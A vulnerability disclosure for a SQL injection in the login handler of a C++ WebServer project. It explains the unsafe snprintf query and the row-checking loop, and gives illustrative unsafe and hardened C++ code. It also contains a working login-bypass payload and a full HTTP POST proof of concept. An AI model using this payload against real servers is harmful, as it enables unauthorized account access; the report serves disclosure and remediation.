BUG_Author: s0l42
Affected Version: WebServer ≤ 1.0
Vendor: WebServer GitHub Repository
Software: WebServer
Vulnerability Files:
code/http/httprequest.cpp:192-195
Tips: To prove the vulnerability we use a user-login scenario; in fact, the risk of this SQLi is greater than what we show here.
A SQL injection was found in code/http/httprequest.cpp:192-195 of WebServer ≤ 1.0: the code uses snprintf to format the user-supplied username and password into a SQL SELECT statement without any check.
Furthermore, another unsafe design makes this vulnerability more dangerous. From line 203 to 219 there is a while loop that fetches every row the SELECT statement returned. If the injected input contains a comment marker such as # or --, the statement returns more than one row, so whichever account's password matches, that account is logged in successfully.
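The two weaknesses described above, reproduced as an added example that is not code from the WebServer project: build_query_unsafe mirrors the snprintf pattern (the statement text is an assumption, not a copy of the project's line 192-195), verify_rows_vulnerable is the row loop that accepts any matching password, and is_valid_username and verify_rows_strict are the defensive counterparts. The three accounts and the payload are constructed from the report; no database is contacted, the statement is only built and inspected.

```cpp
#include <cctype>
#include <cstdio>
#include <string>
#include <utility>
#include <vector>

// Query construction mirroring the pattern the report describes: the username
// is formatted straight into the SELECT with snprintf. The statement text is an
// assumption for illustration, not the project's own code. Nothing is sent to a
// database; the string is returned so the effect of the payload can be seen.
std::string build_query_unsafe(const std::string& name) {
    char order[256] = {0};
    std::snprintf(order, sizeof(order),
                  "SELECT username, password FROM user WHERE username='%s' LIMIT 1",
                  name.c_str());
    return std::string(order);
}

// Defensive input check: account names limited to a conservative character set,
// so quotes, comment markers and whitespace never reach the statement. This is
// defence in depth; the real fix is a prepared statement with bound parameters
// (mysql_stmt_prepare / mysql_stmt_bind_param in libmysqlclient).
bool is_valid_username(const std::string& name) {
    if (name.empty() || name.size() > 32) return false;
    for (unsigned char c : name) {
        if (!(std::isalnum(c) || c == '_')) return false;
    }
    return true;
}

using Row = std::pair<std::string, std::string>;  // (username, password)

// The flawed loop the report points at: every fetched row is compared, so any
// row whose password equals the supplied one logs the caller in.
bool verify_rows_vulnerable(const std::vector<Row>& rows, const std::string& pwd) {
    bool ok = false;
    for (const Row& r : rows) {
        if (r.second == pwd) ok = true;
    }
    return ok;
}

// Hardened loop: a lookup by username must yield exactly one row, and the
// password is compared only against that row. More than one row means the
// statement did not mean what the code assumed, so the login is refused.
bool verify_rows_strict(const std::vector<Row>& rows, const std::string& user,
                        const std::string& pwd) {
    if (rows.size() != 1) return false;
    return rows[0].first == user && rows[0].second == pwd;
}

// Constructed sample data: the three accounts from the report and the PoC username.
const char* kPayload = "test'/**/or/**/'1'/**/like/**/'1'#--";

std::vector<Row> sample_rows() {
    return {{"test1", "111"}, {"test2", "222"}, {"test3", "333"}};
}

int main() {
    std::printf("unsafe statement: %s\n", build_query_unsafe(kPayload).c_str());
    std::printf("payload accepted by validator: %s\n",
                is_valid_username(kPayload) ? "yes" : "no");
    std::printf("vulnerable loop logs in with 333: %s\n",
                verify_rows_vulnerable(sample_rows(), "333") ? "yes" : "no");
    std::printf("strict check logs in with 333: %s\n",
                verify_rows_strict(sample_rows(), "test", "333") ? "yes" : "no");
    return 0;
}
```

Running it prints the built statement, in which the # marker comments out the closing quote and the LIMIT 1, which is why the fetch loop then sees every account. The strict variant refuses the three-row result regardless of whether 333 matches one of them.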
To prove the vulnerability, we create 3 users: the first is test1/111, the second is test2/222 and the third is test3/333. We use the payload below; whether or not the user test exists, if the password 333 matches, the server responds “欢迎您!” (meaning “welcome”) and we are logged in successfully (“错误!” means “error” and indicates a failed login).
username=test'/**/or/**/'1'/**/like/**/'1'#--&password=333
The PoC is as follows:
POST /login HTTP/1.1
Host: xxxx
Content-Length: 58
Cache-Control: max-age=0
Origin: xxxx
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: xxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: xxxx
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive
username=test'/**/or/**/'1'/**/like/**/'1'#--&password=333